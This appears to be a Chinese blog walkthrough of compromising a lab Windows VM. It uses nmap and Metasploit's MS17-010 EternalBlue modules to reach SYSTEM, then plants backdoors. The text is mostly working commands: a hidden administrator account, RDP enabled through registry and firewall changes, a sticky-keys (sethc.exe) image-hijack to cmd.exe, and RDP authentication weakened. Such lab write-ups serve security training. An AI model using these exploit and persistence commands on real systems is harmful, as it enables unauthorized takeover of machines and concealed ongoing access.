搞死虚拟机-永恒之蓝和shift后门

扫描端口:发现开启了445端口可能存在永恒之蓝(ms17_010)漏洞

nmap -sV -p- -A -v 192.168.206.129
搞死虚拟机-永恒之蓝和shift后门_第1张图片

开启msf

msfconsole

搞死虚拟机-永恒之蓝和shift后门_第2张图片

搜素 search ms17_010

搞死虚拟机-永恒之蓝和shift后门_第3张图片

使用msf验证脚本,验证是否存在ms17_010 

use auxiliary/scanner/smb/smb_ms17_010

show options
搞死虚拟机-永恒之蓝和shift后门_第4张图片

配置验证脚本

set RHOSTS 192.168.206.129
运行

run

显示存在ms17_010漏洞

搞死虚拟机-永恒之蓝和shift后门_第5张图片

利用ms17_010:

use exploit/windows/smb/ms17_010_eternalblue
show options

搞死虚拟机-永恒之蓝和shift后门_第6张图片

 配置:set rhosts 192.168.206.129

 利用:run

搞死虚拟机-永恒之蓝和shift后门_第7张图片

执行命令:whoami

获得系统权限

搞死虚拟机-永恒之蓝和shift后门_第8张图片

发现乱码

搞死虚拟机-永恒之蓝和shift后门_第9张图片

原因:indows和linux系统的中文编码不同

解决方式:chcp 65001

原理:CHCP是一个计算机指令,能够显示或设置活动代码页编号。

65001   UTF-8代码页

950繁体中文

936简体中文默认的GBK

437 MS-DOS美国英语

搞死虚拟机-永恒之蓝和shift后门_第10张图片

建立后门

方法一:新建隐藏管理员账户,开启远程桌面,远程进行登陆

新建隐藏用户 net user shy014$ shy014 /add

将新建用户添加到管理员组 net localgroup administrators shy014$ /add

开启3389远程桌面服务

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

配置防火墙策略

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
netsh 是 windows 的网络配置命令,advfirewall firewall 意思是防火墙高级设置,add rule 是添加一条规则,name 指定规则名称,protocol 指定协议,dir 指定是出战还是入站,localport 指定端口,action 指定动作 allow 允许。

使用创建的隐藏账户 远程进行登陆

搞死虚拟机-永恒之蓝和shift后门_第11张图片

方法二:粘滞键后门-映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

命令说明:reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。Image File Execution Option 这个目录就是用来设置镜像劫持的,要被劫持的就是命令中的 sethc 粘滞键程序,随后通过 / v 来指定键名,这个键名 debugger 是固定的,然后通过 / t 来指定类型,即 REG_SZ 字符串类型,最后通过 / d 来指定键的值,即被恶意替换的程序,也就是我们的 cmd

开启远程桌面

1,配置防火墙允许远程桌面连接

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

搞死虚拟机-永恒之蓝和shift后门_第12张图片
netsh 是 windows 的网络配置命令,advfirewall firewall 意思是防火墙高级设置,add rule 是添加一条规则,name 指定规则名称,protocol 指定协议,dir 指定是出战还是入站,localport 指定端口,action 指定动作 allow 允许。

2,开启远程桌面

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /D 0 /f

搞死虚拟机-永恒之蓝和shift后门_第13张图片

配置远程桌面:

1,UserAuthentication(用户身份验证选项)设置为0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 

搞死虚拟机-永恒之蓝和shift后门_第14张图片

(yes是因为本来就是0,重新写一下) 

1 远程桌面连接之前就进行身份验证

0 远程桌面连接之前不需要进行身份验证,连接到远程桌面的锁屏界面后才进行身份验证

2,securitylayer(安全层)设置为0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0

搞死虚拟机-永恒之蓝和shift后门_第15张图片
0 就是连接前使用 rdp 协议进行身份验证,rdp 即远程桌面连接,可以简单理解为就是关闭验证。1 是指在连接前两端协商来进行身份验证,这个是默认值。2 就是使用 tls 协议来进行

0  会直接跳转到锁屏界面

1 需要输入用户名后才能跳转到锁屏界面

测试

搞死虚拟机-永恒之蓝和shift后门_第16张图片

向大佬学习:

参考文章:

https://blog.csdn.net/fageweiketang/article/details/88317656

 

 

 

你可能感兴趣的:(渗透,漏洞,内网渗透)